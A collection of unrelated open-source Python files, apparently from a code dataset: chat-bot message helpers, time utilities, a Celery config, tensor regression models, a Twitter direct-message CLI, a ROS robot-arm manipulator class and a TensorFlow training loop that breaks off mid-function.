def identification_user(self, user_id):
send_message("Please follow the link and paste the code back to me !", user_id)
def identification_completed_user(self, user_id):
send_message("Hey everything is setup !", user_id)
def something_gone_wrong(self, user_id):
send_message("Outch !", user_id)
send_message("Something gone wrong", user_id)
send_message("I will keep you informed", user_id)
def upload_succeeded(self, user_id):
send_message("Hey niceJob !!", user_id)
def request_not_understood(self, user_id):
send_message("Hum, I dont understand", user_id)
def user_identification_url(self, user_id, url):
send_message(url, user_id)
|
ThibF/G-youmus
|
users_push/userhostess.py
|
Python
|
mit
| 872
|
#Copyright (c) 2012 Luminoso, LLC
#
#Permission is hereby granted, free of charge, to any person obtaining a
#copy of this software and associated documentation files (the "Software"),
#to deal in the Software without restriction, including without limitation
#the rights to use, copy, modify, merge, publish, distribute, sublicense,
#and/or sell copies of the Software, and to permit persons to whom the
#Software is furnished to do so, subject to the following conditions:
#
#The above copyright notice and this permission notice shall be included in
#all copies or substantial portions of the Software.
#
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
#FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
#DEALINGS IN THE SOFTWARE.
# Load timestamp methods
from datetime import datetime
from time import mktime
def datetime2epoch(dt):
"""Convert a datetime object into milliseconds from epoch"""
return int(mktime(dt.timetuple())*1000)
def epoch2datetime(t):
"""Convert milliseconds from epoch to a local datetime object"""
return datetime.fromtimestamp(t/1000.0)
def epoch():
"""Get the current time in milliseconds from epoch"""
return datetime2epoch(datetime.now())
|
LuminosoInsight/jstime
|
jstime.py
|
Python
|
mit
| 1,541
|
"""
Celery config for tiny_hands_pac project.
For more information on this file, see
http://celery.readthedocs.org/en/latest/django/first-steps-with-django.html
Run your celery worker(s) as `djcelery`, which is an alias for
`celery -A tiny_hands_pac worker --loglevel=info`.
A celerybeat scheduler can be started together with a worker by `djcelery -B`
or as a separate process:
`celery -A tiny_hands_pac beat --loglevel=info -s /tmp/celerybeat-schedule`.
It needs to store the last run times of the tasks in a local database file:
if no -s option is provided it defaults to the cwd. On production it shouldn't be in /tmp/.
"""
from __future__ import absolute_import
import os
from celery import Celery
from django.conf import settings
# set the default Django settings module for the 'celery' program.
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "tiny_hands_pac.settings.production")
app = Celery("tiny_hands_pac")
app.config_from_object('django.conf:settings')
app.autodiscover_tasks(lambda: settings.INSTALLED_APPS)
|
DonaldTrumpHasTinyHands/tiny_hands_pac
|
tiny_hands_pac/celery.py
|
Python
|
mit
| 1,032
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
import numpy as np
import sktensor as skt
import scipy.linalg
from utils import rmse
from sklearn.base import BaseEstimator
import traceback
class TensorRegression(BaseEstimator):
"""
Scikit learn estimator for various regression methods (see paper for details):
- RLS: Regularized Least Squares
- LRR: Low-rank regression (i.e. reduced rank regression)
- HOLRR: Higher-order low-rank regression
- K-{ALGO}: Kernelized version of the above algorithms.
"""
def __init__(self, algo, gamma=0., rank=None, kernel_fct=None, cov=None, beta=0.,noise_est=None):
self.W = None
assert algo in ['RLS','HOLRR', 'K_HOLRR', 'LRR', 'K_LRR', 'K_RLS'], 'algorithm %s not implemented' % algo
self.algo = algo
self.gamma = gamma
self.rank = rank
self.kernel_fct = kernel_fct
self.cov = cov
self.beta = beta
self.noise_est = noise_est
if cov is not None and np.linalg.matrix_rank(cov) < cov.shape[0]:
cov += np.eye(cov.shape[0]) * 1e-5
def get_params(self, deep=True):
return {'gamma':self.gamma, 'rank':self.rank,
'algo':self.algo, 'kernel_fct':self.kernel_fct,
'beta':self.beta}
def set_params(self,**d):
for parameter, value in d.items():
setattr(self,parameter, value)
return self
def predict(self,X):
X = skt.dtensor(X)
if self.algo[:2] == 'K_':
X = X.unfold(0)
K = self.kernel_fct.gram_matrix(self.traindata,X)
return self.W.ttm(K,0)
else:
return self.W.ttm(X.unfold(0),0)
def fit(self,X, Y):
X = skt.dtensor(X)
Y = skt.dtensor(Y)
self.traindata = X
try:
if self.algo == "RLS":
self.W = RLS(X,Y, gamma=self.gamma)
elif self.algo == "HOLRR":
self.W = HOLRR(X,Y,gamma=self.gamma,R=self.rank)
elif self.algo == 'LRR':
self.W = LRR(X,Y,rank=self.rank,gamma=self.gamma)
elif self.algo == 'K_HOLRR':
self.W = K_HOLRR(X,Y,rank=self.rank,kernel=self.kernel_fct,gamma=self.gamma)
elif self.algo == 'K_RLS':
self.W = K_RLS(X,Y,kernel=self.kernel_fct,gamma=self.gamma)
elif self.algo == 'K_LRR':
self.W = K_LRR(X,Y,self.rank,self.kernel_fct,self.gamma)
except:
traceback.print_exc()
if self.algo[:2] == 'K_':
self.W = skt.dtensor(np.zeros(X.shape[:1] + Y.shape[1:]))
else:
self.W = skt.dtensor(np.zeros(X.shape[1:] + Y.shape[1:]))
def score(self,X,Y):
return -1*self.loss(X,Y)
def loss(self,X,Y):
return rmse(self.predict(X),Y)
def RLS(X,Y, gamma = 0.):
X_mat = X.unfold(0)
Y_mat = Y.unfold(0)
W_ols = np.linalg.inv(X_mat.T.dot(X_mat) + gamma * np.eye(X_mat.shape[1])).dot(X_mat.T).dot(Y_mat)
W_ols.ten_shape = X_mat.shape[1:] + Y.shape[1:]
return W_ols.fold()
def LRR(X,Y, rank, gamma = 0.):
if type(X) == 'sktensor.dtensor.dtensor':
X = X.unfold(0)
Y_mat = Y.unfold(0)
XtX = X.T.dot(X)
XtX_inv = np.linalg.inv(XtX + gamma * np.eye(X.shape[1]))
W_ols = skt.dtensor(XtX_inv.dot(X.T).dot(Y_mat)).unfold(0)
W_ols.ten_shape = X.shape[1:] + Y.shape[1:]
_,V = scipy.sparse.linalg.eigs(Y_mat.T.dot(X).dot(XtX_inv).dot(X.T).dot(Y_mat),k=rank)
P = V.dot(V.T)
W_rr = W_ols.dot(P).fold()
return W_rr
def HOLRR(X,Y,R,gamma = 0.):
if type(X) == 'sktensor.dtensor.dtensor':
X = X.unfold(0)
W_shape = X.shape[1:] + Y.shape[1:]
I = np.eye(X.shape[1])
M = []
XX_inv = np.linalg.inv(X.T.dot(X) + gamma*I)
A = XX_inv.dot(X.T).dot(Y.unfold(0)).dot(Y.unfold(0).T).dot(X)
if R[0] == W_shape[0]:
U = np.eye(R[0])
else:
ev,U = scipy.sparse.linalg.eigs(A,k=R[0])
M.append(U)
for i in range(1,len(R)):
if R[i] == W_shape[i]:
tmp = np.eye(W_shape[i])
else:
tmp = skt.core.nvecs(Y,i,R[i])
M.append(tmp)
U1 = M[0]
G = Y.ttm([(np.linalg.inv(U1.T.dot(X.T.dot(X)+gamma*I).dot(U1)).dot(U1.T).dot(X.T)).T] + M[1:], transp=True)
return G.ttm(M)
def K_HOLRR(X,Y,rank,kernel, gamma = 0., verbose = -1):
K = kernel.gram_matrix(X)
I = np.eye(X.shape[0])
M = []
W_shape = K.shape[1:] + Y.shape[1:]
K_inv = np.linalg.inv(K + gamma*I)
A = K_inv.dot(Y.unfold(0)).dot(Y.unfold(0).T).dot(K)
if rank[0] == W_shape[0]:
U = np.eye(rank[0])
else:
try:
ev,U = scipy.sparse.linalg.eigs(A,k=rank[0])
except scipy.sparse.linalg.ArpackNoConvergence:
print "eigen decomposition did not converge... " + str(Y.shape) + " " + str(rank) + " " + str(kernel)
return skt.dtensor(np.zeros(W_shape))
M.append(U)
for i in range(1,len(rank)):
if rank[i] == W_shape[i]:
tmp = np.eye(W_shape[i])
else:
tmp = skt.core.nvecs(Y,i,rank[i])
M.append(tmp)
U1 = M[0]
G = Y.ttm([((np.linalg.inv(U1.T.dot(K).dot(K+gamma*I).dot(U1))).dot(U1.T).dot(K)).T] + M[1:], transp=True)
return G.ttm(M)
def K_LRR(X,Y,R,kernel, gamma = 0.):
K = kernel.gram_matrix(X)
return LRR(K,Y,R,gamma)
def K_RLS(X,Y, kernel,gamma = 0.):
K = kernel.gram_matrix(X)
C = RLS(skt.dtensor(K),Y,gamma)
return C
|
grwip/HOLRR
|
models.py
|
Python
|
mit
| 5,532
|
"""direct_messages.py: Implementation of class
AbstractTwitterDirectMessageCommand and its subclasses.
"""
from argparse import ArgumentParser
from . import AbstractTwitterCommand, call_decorator
from ..parsers import (
filter_args,
cache,
parser_user_single,
parser_count_statuses,
parser_page,
parser_since_max_ids,
parser_include_entities,
parser_skip_status,)
# GET direct_messages
# POST direct_messages/destroy
# POST direct_messages/new
# GET direct_messages/sent
# GET direct_messages/show
DM = ('direct_messages', 'list')
DM_DESTROY = ('direct_messages/destroy', 'destroy')
DM_NEW = ('direct_messages/new', 'new', 'create')
DM_SENT = ('direct_messages/sent', 'sent')
DM_SHOW = ('direct_messages/show', 'show')
# pylint: disable=abstract-method
class AbstractTwitterDirectMessageCommand(AbstractTwitterCommand):
"""n/a"""
pass
class Command(AbstractTwitterDirectMessageCommand):
"""Print the 20 most recent direct messages sent to the
authenticating user.
"""
def create_parser(self, subparsers):
parser = subparsers.add_parser(
DM[0],
aliases=DM[1:],
parents=[parser_since_max_ids(),
parser_count_statuses(), # 20, 200
parser_include_entities(),
parser_skip_status()],
help=self.__doc__)
return parser
@call_decorator
def __call__(self):
"""Request GET direct_messages for Twitter."""
kwargs = filter_args(
vars(self.args),
'since_id', 'max_id',
'count', 'include_entities', 'skip_status')
return kwargs, self.twhandler.direct_messages
class CommandDestroy(AbstractTwitterDirectMessageCommand):
"""Destroy the direct message specified in the required ID
parameter.
"""
def create_parser(self, subparsers):
parser = subparsers.add_parser(
DM_DESTROY[0],
aliases=DM_DESTROY[1:],
parents=[parser_id(),
parser_include_entities()],
help=self.__doc__)
return parser
@call_decorator
def __call__(self):
"""Request POST direct_messages/destroy for Twitter."""
kwargs = filter_args(
vars(self.args),
'_id', 'include_entities')
return kwargs, self.twhandler.direct_messages.destroy
class CommandNew(AbstractTwitterDirectMessageCommand):
"""Send a new direct message to the specified user from the
authenticating user.
"""
def create_parser(self, subparsers):
parser = subparsers.add_parser(
DM_NEW[0],
aliases=DM_NEW[1:],
parents=[parser_user_single()],
help=self.__doc__)
parser.add_argument(
'text',
help='the text of your direct message')
return parser
@call_decorator
def __call__(self):
"""Request POST direct_messages/new for Twitter."""
kwargs = filter_args(
vars(self.args),
'user_id', 'screen_name', 'text')
return kwargs, self.twhandler.direct_messages.new
class CommandSent(AbstractTwitterDirectMessageCommand):
"""Print the 20 most recent direct messages sent by the
authenticating user.
"""
def create_parser(self, subparsers):
parser = subparsers.add_parser(
DM_SENT[0],
aliases=DM_SENT[1:],
parents=[parser_since_max_ids(),
parser_count_statuses(),
parser_page(),
parser_include_entities()],
help=self.__doc__)
return parser
@call_decorator
def __call__(self):
"""Request GET direct_messages/sent for Twitter."""
kwargs = filter_args(
vars(self.args),
'since_id', 'max_id',
'count', 'page', 'include_entities')
return kwargs, self.twhandler.direct_messages.sent
class CommandShow(AbstractTwitterDirectMessageCommand):
"""Print a single direct message, specified by an id parameter."""
def create_parser(self, subparsers):
parser = subparsers.add_parser(
DM_SHOW[0],
aliases=DM_SHOW[1:],
parents=[parser_id()],
help=self.__doc__)
return parser
@call_decorator
def __call__(self):
"""Request GET direct_messages/show for Twitter."""
# pylint: disable=protected-access
return dict(_id=self.args._id), self.twhandler.direct_messages.show
def make_commands(manager):
"""Prototype"""
# pylint: disable=no-member
return (cmd_t(manager) for cmd_t in
AbstractTwitterDirectMessageCommand.__subclasses__())
@cache
def parser_id():
"""Return the parser for id argument."""
parser = ArgumentParser(add_help=False)
parser.add_argument(
'_id',
metavar='<dm_id>',
help='the ID of the direct message to delete')
return parser
|
showa-yojyo/bin
|
twmods/commands/direct_messages.py
|
Python
|
mit
| 5,011
|
import roslib; roslib.load_manifest('hlpr_manipulation_utils')
from sensor_msgs.msg import JointState
from vector_msgs.msg import JacoCartesianVelocityCmd, LinearActuatorCmd, GripperCmd, GripperStat
from trajectory_msgs.msg import JointTrajectory, JointTrajectoryPoint
from wpi_jaco_msgs.msg import AngularCommand, CartesianCommand
#from wpi_jaco_msgs.srv import GravComp
from hlpr_manipulation_utils.arm_moveit import *
import rospy
from math import pi, sqrt
from collections import namedtuple
from control_msgs.msg import FollowJointTrajectoryGoal, FollowJointTrajectoryAction
import actionlib
import time
class Manipulator:
def __init__(self, arm_prefix = 'right'):
self.arm = Arm()
self.gripper = Gripper()
self.linear_actuator = LinearActuator()
class Gripper:
def __init__(self, prefix='right'):
self.pub_grp = rospy.Publisher('/vector/'+prefix+'_gripper/cmd', GripperCmd, queue_size = 10)
self.cmd = GripperCmd()
#i have it here but it is not useful
#rospy.Subscriber('/vector/right_gripper/joint_states', JointState, self.js_cb)
#self.last_js_update = None
#self.joint_state = None
rospy.Subscriber('/vector/'+prefix+'_gripper/stat', GripperStat, self.st_cb)
self.last_st_update = None
self.gripper_stat = GripperStat()
#def js_cb(self, inState):
# self.joint_state = inState.position
# self.last_js_update = rospy.get_time()
def st_cb(self, inStat):
self.gripperStat = inStat
self.last_st_update = None
def is_ready(self):
return self.gripperStat.is_ready
def is_reset(self):
return self.gripperStat.is_reset
def is_moving(self):
return self.gripperStat.is_moving
def object_detected(self):
return self.gripperStat.obj_detected
def get_pos(self):
return self.gripperStat.position
def get_commanded_pos(self):
return self.gripperStat.requested_position
def get_applied_current(self):
return self.gripperStat.current
def set_pos(self, position, speed = 0.02, force = 100, rate = 10, iterations = 5):
self.cmd.position = position
self.cmd.speed = speed
self.cmd.force = force
rrate = rospy.Rate(rate)
for i in range(0,iterations):
self.pub_grp.publish(self.cmd)
rrate.sleep()
def open(self, speed = 0.02, force = 100):
self.set_pos(0.085,speed,force)
def close(self, speed = 0.02, force = 100):
self.set_pos(0,speed,force)
class LinearActuator:
def __init__(self):
self.pub_lin = rospy.Publisher('/vector/linear_actuator_cmd', LinearActuatorCmd, queue_size = 10)
self.cmd = LinearActuatorCmd()
#i agree that the naming is weird
rospy.Subscriber('/vector/joint_states', JointState, self.js_cb)
self.last_js_update = None
self.joint_state = None
def js_cb(self, inState):
self.joint_state = inState.position
self.last_js_update = rospy.get_time()
def set_pos(self, position, vel = 0.):
self.cmd = LinearActuatorCmd()
self.cmd.desired_position_m = position
if not vel == 0:
print 'What are you thinking? Setting the vel back to 0. If you are sure, change this line in the code'
vel = 0.
#probably feed forward velocity
self.cmd.fdfwd_vel_mps = vel
self.pub_lin.publish(self.cmd)
class Arm:
def __init__(self, arm_prefix = 'right'):
self.pub_jaco_ang = rospy.Publisher('/jaco_arm/angular_cmd', AngularCommand, queue_size = 10, latch=True)
self.pub_jaco_cart = rospy.Publisher('/jaco_arm/cartesian_cmd', CartesianCommand, queue_size = 10, latch=True)
self._arm_prefix = arm_prefix
self.arm_joint_names = [ self._arm_prefix + "_shoulder_pan_joint", self._arm_prefix + "_shoulder_lift_joint", self._arm_prefix + "_elbow_joint",
self._arm_prefix + "_wrist_1_joint", self._arm_prefix + "_wrist_2_joint", self._arm_prefix + "_wrist_3_joint"]
self.joint_states = [0 for i in range(0,len( self.arm_joint_names))]
rospy.Subscriber('/vector/right_arm/joint_states', JointState, self.js_cb)
self.last_js_update = None
self.smooth_joint_trajectory_client = actionlib.SimpleActionClient('/jaco_arm/joint_velocity_controller/trajectory', FollowJointTrajectoryAction)
#if(self.smooth_joint_trajectory_client.wait_for_server(rospy.Duration(5.0))):
if(self.smooth_joint_trajectory_client.wait_for_server()):
self.traj_connection = True
else:
self.traj_connection = False
print self.traj_connection
self.angular_cmd = AngularCommand()
self.angular_cmd.armCommand = True
self.angular_cmd.fingerCommand = False
self.angular_cmd.repeat = True
self.cartesian_cmd = CartesianCommand()
self.cartesian_cmd.armCommand = True
self.cartesian_cmd.fingerCommand = False
self.cartesian_cmd.repeat = True
self._init_tuck_poses()
# if(rospy.wait_for_service('/jaco_arm/grav_comp')):
# self.gc_connection = True
# else:
self.gc_connection = False
# self.grav_comp_client = rospy.ServiceProxy('/jaco_arm/grav_comp', GravComp)
self.arm_planner = ArmMoveIt()
def _get_arm_joint_values(self, msg):
# Cycle through the active joints and populate
# a dictionary for those values
joint_values = dict()
for joint_name in self._arm_joint_names:
# Find that joint name in msg
idx = msg.name.index(joint_name)
# Populate the joint message in a dictionary
joint_values[joint_name] = msg.position[idx]
return joint_values
def enableGravComp(self):
#if(not self.gc_connection):
# print 'GravComp Service not available'
print self.grav_comp_client(True)
def disableGravComp(self):
#if(not self.gc_connection):
# print 'GravComp Service not available'
print self.grav_comp_client(False)
def js_cb(self, inState):
for i in range(0,len(inState.position)):
self.joint_states[i] = inState.position[i]
self.last_js_update = rospy.get_time()
def get_pos(self):
return self.joint_states
def ang_pos_cmd(self, angles):
if not len(angles) == len(self.arm_joint_names):
print "Number of desired joint angles does not match the number of available joints"
return
self.angular_cmd.position = True
self.angular_cmd.joints = angles
self.pub_jaco_ang.publish(self.angular_cmd)
def ang_vel_cmd(self, velocities):
if not len(velocities) == len(self.arm_joint_names):
print "Number of desired joint velocities does not match the number of available joints"
return
self.angular_cmd.position = False
self.angular_cmd.joints = velocities
self.pub_jaco_ang.publish(self.angular_cmd)
def cart_pos_cmd(self, pose):
if not len(pose) == 6:
print "Not enough pose parameters specified"
return
self.cartesian_cmd.position = True
self.cartesian_cmd.arm.linear.x = pose[0]
self.cartesian_cmd.arm.linear.y = pose[1]
self.cartesian_cmd.arm.linear.z = pose[2]
self.cartesian_cmd.arm.angular.x = pose[3]
self.cartesian_cmd.arm.angular.y = pose[4]
self.cartesian_cmd.arm.angular.z = pose[5]
self.pub_jaco_cart.publish(self.cartesian_cmd)
def cart_pos_cmd(self, translation, rotation):
if not len(translation) == 3:
print "Not enough translations specified"
return
if not len(rotation) == 3:
print "Not enough rotations specified"
return
pose = translation + rotation
self.cart_pos_cmd(pose)
def cart_vel_cmd(self, vels):
if not len(vels) == 6:
print "Not enough velocities specified"
return
self.cartesian_cmd.position = False
self.cartesian_cmd.arm.linear.x = vels[0]
self.cartesian_cmd.arm.linear.y = vels[1]
self.cartesian_cmd.arm.linear.z = vels[2]
self.cartesian_cmd.arm.angular.x = vels[3]
self.cartesian_cmd.arm.angular.y = vels[4]
self.cartesian_cmd.arm.angular.z = vels[5]
self.pub_jaco_cart.publish(self.cartesian_cmd)
def cart_vel_cmd(self, translation, rotation):
if not len(translation) == 3:
print "Not enough translation velocities specified"
return
if not len(rotation) == 3:
print "Not enough rotation velocities specified"
return
vels = translation + rotation
self.cart_pos_cmd(vels)
def ang_cmd_loop(self,angles,rate=10,iterations=5):
rrate = rospy.Rate(rate)
for i in range(0,iterations):
self.ang_pos_cmd(angles)
rrate.sleep()
def ang_cmd_wait(self,angles,epsilon=0.05, maxIter=50, rate=10):
error = epsilon + 1;
epsilon=5
iterNum = 0;
#self.ang_cmd_loop(angles,rate)
self.ang_pos_cmd(angles)
rrate = rospy.Rate(rate)
while error > epsilon and iterNum < maxIter:
error = vectorDiff(self.joint_states,angles)
iterNum += 1
rrate.sleep()
if iterNum == maxIter:
return False
return True
#the full handling of vels, accs and effs will come later
# only the waypoints are needed for wpi jaco! the rest gets thrown away anyway so feel free to skip
def sendWaypointTrajectory(self, waypoints, durations = 0., vels = 0., accs = 0., effs = 0.):
if not self.ang_cmd_wait(waypoints[0]):
print 'Cannot go to the first point in the trajectory'
return None
# else:
# print 'Went to first'
if not self.traj_connection:
print 'Action server connection was not established'
return None
joint_traj = JointTrajectory()
joint_traj.joint_names = self.arm_joint_names;
if not durations == 0:
if not len(durations) == waypoints:
raise Exception('The number of duration points is not equal to the number of provided waypoints')
if not vels == 0:
if not len(vels) == waypoints:
raise Exception('The number velocity points is not equal to the number of provided waypoints')
if not accs == 0:
if not len(accs) == waypoints:
raise Exception('The number acceleration points is not equal to the number of provided waypoints')
if not effs == 0:
if not len(effs) == waypoints:
raise Exception('The number effort points is not equal to the number of provided waypoints')
if not effs == 0:
if not (vels == 0 and accs == 0):
raise Exception('Cannot specify efforts with velocities and accelerations at the same time')
if (not accs == 0) and vels == 0:
raise Exception('Cannot specify accelerations without velocities')
total_time_from_start = 0.5;
for t in range(0, len(waypoints)):
point = JointTrajectoryPoint()
waypoint = waypoints[t]
if not len(waypoint) == len(joint_traj.joint_names):
raise Exception('The number of provided joint positions is not equal to the number of available joints for index: ' + str(t))
point.positions = waypoint
if not vels == 0.:
velocity = vels[t]
if not len(velocity) == len(joint_traj.joint_names):
raise Exception('The number of provided joint velocities is not equal to the number of available joints for index: ' + str(t))
point.velocities = velocity
if not accs == 0.:
acceleration = accs[t]
if not len(acceleration) == len(joint_traj.joint_names):
raise Exception('The number of provided joint accelerations is not equal to the number of available joints for index: ' + str(t))
point.accelerations = accelerations
if not effs == 0.:
effort = effs[t]
if not len(effort) == len(joint_traj.joint_names):
raise Exception('The number of provided joint efforts is not equal to the number of available joints for index: ' + str(t))
point.effort = effort
if not durations == 0.:
point.duration = duration
# Deal with increasing time for each trajectory point
point.time_from_start = rospy.Duration(total_time_from_start)
total_time_from_start = total_time_from_start + 1.0
# Set the points
joint_traj.points.append(point)
traj_goal = FollowJointTrajectoryGoal()
traj_goal.trajectory = joint_traj
self.smooth_joint_trajectory_client.send_goal(traj_goal)
self.smooth_joint_trajectory_client.wait_for_result()
return self.smooth_joint_trajectory_client.get_result()
# Expects waypoints to be in joint space
def execute_traj_moveit(self, waypoints):
# Cycle through waypoints
for point in waypoints:
plannedTraj = self.arm_planner.plan_jointTargetInput(point)
if plannedTraj == None or len(plannedTraj.joint_trajectory.points) < 1:
print "Error: no plan found"
return -1
else:
traj_goal = FollowJointTrajectoryGoal()
traj_goal.trajectory = plannedTraj.joint_trajectory
self.smooth_joint_trajectory_client.send_goal(traj_goal)
self.smooth_joint_trajectory_client.wait_for_result()
self.smooth_joint_trajectory_client.get_result()
return 1
# Expects waypoints to be in end effector space
def execute_pose_traj_moveit(self, waypoints):
# Cycle through waypoints
for point in waypoints:
plannedTraj = self.arm_planner.plan_poseTargetInput(point)
if plannedTraj == None or len(plannedTraj.joint_trajectory.points) < 1:
print "Error: no plan found"
return -1
else:
self.execute_plan_traj(plannedTraj)
return 1
def execute_plan_traj(self, plannedTraj):
traj_goal = FollowJointTrajectoryGoal()
traj_goal.trajectory = plannedTraj.joint_trajectory
self.smooth_joint_trajectory_client.send_goal(traj_goal)
self.smooth_joint_trajectory_client.wait_for_result()
self.smooth_joint_trajectory_client.get_result()
#TODO: figure this out
def upper_tuck(self, use_moveit=True, vanilla = False):
if use_moveit:
# Just last point
return self.execute_traj_moveit([self.ut_wps[-1]])
elif vanilla:
self.sendWaypointTrajectory(self.ut_wps)
return 1
else:
self._ut_with_network()
return 1
def upper_untuck(self, use_moveit=True, vanilla = False):
if use_moveit:
# Just last point
self.execute_traj_moveit([self.un_ut_wps[-1]])
elif vanilla:
self.sendWaypointTrajectory(self.un_ut_wps)
else:
self.untuck()
def lower_tuck(self, use_moveit=True, vanilla = False):
if use_moveit:
# Just last point
self.execute_traj_moveit([self.lt_wps[-1]])
elif vanilla:
self.sendWaypointTrajectory(self.lt_wps)
else:
self._lt_with_network()
def lower_untuck(self, use_moveit=True, vanilla = False):
if use_moveit:
# Just last point
self.execute_traj_moveit([self.un_lt_wps[-1]])
elif vanilla:
self.sendWaypointTrajectory(self.un_lt_wps)
else:
self.untuck()
def untuck(self, use_moveit=True):
if use_moveit:
# Just last point
self.execute_traj_moveit([self.tuck_network[-1]])
else:
self._untuck_with_network()
def _init_tuck_poses(self):
self.mid_wp = [-1.57, 3.14, 1.05, -1.57, 1.05, 1.57]
lt_wp0 = [-1.65, 3.68, 1.12, -2.13, 1.48, 2.10]
lt_wp1 = [-1.49, 4.00, 1.47, -1.74, 1.25, 1.96]
lt_wp2 = [-1.23, 4.50, 0.95, -2.31, 1.82, 1.96]
lt_wp3 = [-1.21, 4.76, 0.83, -2.60, 2.56, 1.63]
self.lt_wps = [lt_wp0, lt_wp1, lt_wp2, lt_wp3]
self.un_lt_wps = self.lt_wps[::-1]
ut_wp0 = [-1.60, 2.20, 0.80, -2.20, 1.50, 1.20]
ut_wp1 = [-1.70, 2.00, 1.00, -2.20, 2.00, 0.90]
ut_wp2 = [-1.80, 1.80, 1.00, -2.10, 2.50, 0.72]
ut_wp3 = [-1.90, 1.50, 0.50, -2.00, 3.0, 0.72]
self.ut_wps = [ut_wp0,ut_wp1,ut_wp2,ut_wp3]
self.un_ut_wps = self.ut_wps[::-1]
self.tuck_network = self.un_lt_wps + [self.mid_wp] + self.ut_wps
self.reversed_tuck_network = self.tuck_network[::-1]
def _find_closest_tuck_wp(self, tuck_wps, max_allowed_dist = 8.0):
if self.last_js_update is not None:
if self.last_js_update + 2.0 < rospy.get_time():
print 'The newest joint state information is too old.'
return None
minDiff = 1000;
minInd = -1
for i in range(0,len(tuck_wps)):
diff = vectorDiff(tuck_wps[i],self.joint_states)
if diff < minDiff:
minDiff = diff
minInd = i
if minDiff > max_allowed_dist:
print 'Current arm configuration ' + str(self.joint_states) + ' is too far from the tuck network: ' + str(minDiff) + ' ' + str(minInd)
return None
return minInd
def _lt_with_network(self):
ind = self._find_closest_tuck_wp(self.reversed_tuck_network)
if ind is not None:
self.sendWaypointTrajectory(self.reversed_tuck_network[ind:])
def _ut_with_network(self):
ind = self._find_closest_tuck_wp(self.tuck_network)
if ind is not None:
self.sendWaypointTrajectory(self.tuck_network[ind:])
def _untuck_with_network(self):
ind = self._find_closest_tuck_wp(self.tuck_network)
if ind is not None:
midPoint = 4;
if ind == midPoint:
wps = self.tuck_network[midPoint]
elif ind < midPoint:
wps = self.tuck_network[ind:midPoint+1]
else:
wps = self.reversed_tuck_network[(len(self.reversed_tuck_network)-ind+1):midPoint+1]
self.sendWaypointTrajectory(wps)
def vectorDiff(v1,v2):
error = 0;
l = min(len(v1),len(v2))
for i in range(0,l):
diff = (v1[i] - v2[i])
error += diff*diff;
error = sqrt(error)
return error
|
kirmani/hlpr_cadence
|
third_party/hlpr_manipulation/hlpr_manipulation_utils/src/hlpr_manipulation_utils/manipulator.py
|
Python
|
mit
| 17,522
|
import tensorflow as tf
import numpy as np
class trainer(object):
def __init__(self, sess, model, Input, hps, path):
self.sess = sess
self.model = model
self.Input = Input
self.hps = hps
self.path = path
self.image = model.image
self.target = model.target
self.logits = model.logits
self.is_training = model.is_training
if 'keep_probs' in hps:
self.keep_probs = model.keep_probs
else:
self.keep_probs = None
self.global_step = tf.Variable(0, trainable=False, name='global_step')
self._train()
self._train_feed()
def _train_feed(self):
if self.keep_probs is None:
feed = lambda x, y, z: {self.image: x,
self.target: y,
self.is_training: z}
self.train_feed = lambda x, y: feed(x, y, True)
self.eval_feed = lambda x, y: feed(x, y, False)
else:
feed = lambda x, y, z, p: {self.image: x,
self.target: y,
self.is_training: z,
self.keep_probs: p}
self.train_feed = lambda x, y: feed(x, y, True, self.hps['keep_probs'])
self.eval_feed = lambda x, y: feed(x, y, False, 1.0)
def _train(self):
cross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(self.logits, self.target)
total_reg_loss = tf.add_n(tf.get_collection('reg_losses'), name='total_reg_loss')
self.loss = tf.reduce_mean(cross_entropy) + total_reg_loss
#self.lr = tf.train.piecewise_constant(self.global_step, [32000, 48000], [0.1, 0.01, 0.001])
self.lr = tf.train.piecewise_constant(self.global_step, [383*89, 383*133], [0.1, 0.01, 0.001])
#self.lr = tf.train.exponential_decay(0.1, self.global_step, 25*383, 0.5, staircase=True)
self.optimize = tf.train.MomentumOptimizer(learning_rate=self.lr, momentum=0.9)
self.train_op = self.optimize.minimize(self.loss, global_step=self.global_step)
self.correct_prediction = tf.equal(tf.argmax(self.logits, 1), self.target)
self.accuracy = tf.reduce_mean(tf.cast(self.correct_prediction, "float"))
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
if update_ops:
self.updates = tf.group(*update_ops)
def summary_setting(self):
self.summary_loss = tf.placeholder(dtype=tf.float32, shape=[])
self.summary_accuracy = tf.placeholder(dtype=tf.float32, shape=[])
tf.summary.scalar('loss', self.summary_loss)
tf.summary.scalar('accuracy', self.summary_accuracy)
self.summary_op = tf.merge_all_summaries()
self.summary_writer = tf.summary.FileWriter(self.path, self.sess.graph)
def train(self):
self.summary_setting()
hps = self.hps
saver = tf.train.Saver()
step = -1
for epoch in range(hps['max_epoch']):
for i in range(self.Input.epoch_size):
step +=1
x, y = self.Input.batch()
with tf.control_dependencies([self.loss]):
self.sess.run([self.train_op, self.updates],
feed_dict=self.train_feed(x, y))
if step % 20 == 0:
self.validate(x, y)
saver.save(self.sess, self.path + '/model')
print "---Model have been saved---"
def validate(self, x, y):
loss = []
correct_prediction = []
for i in range(20):
loss_, correct_prediction_ = self.sess.run(
[self.loss, self.correct_prediction],
feed_dict=self.eval_feed(self.Input.val_data[i*50:i*50+50],
self.Input.val_labels[i*50:i*50+50]))
loss.append(loss_)
correct_prediction.append(correct_prediction_)
loss = np.mean(loss)
accuracy = np.mean(correct_prediction)
summary = self.sess.run(self.summary_op,
feed_dict={self.summary_loss: loss, self.summary_accuracy: accuracy})
t_loss, t_accuracy = self.sess.run([self.loss, self.accuracy],
feed_dict=self.eval_feed(x, y))
self.summary_writer.add_summary(summary, self.global_step.eval())
print "step:{0}, loss: {1}, accuracy: {2}".format(self.global_step.eval(), loss, accuracy)
print "train: loss: {0}, accuracy: {1}".format(t_loss, t_accuracy)
def eval(self):
correct_prediction = []
for i in range(10000/50):
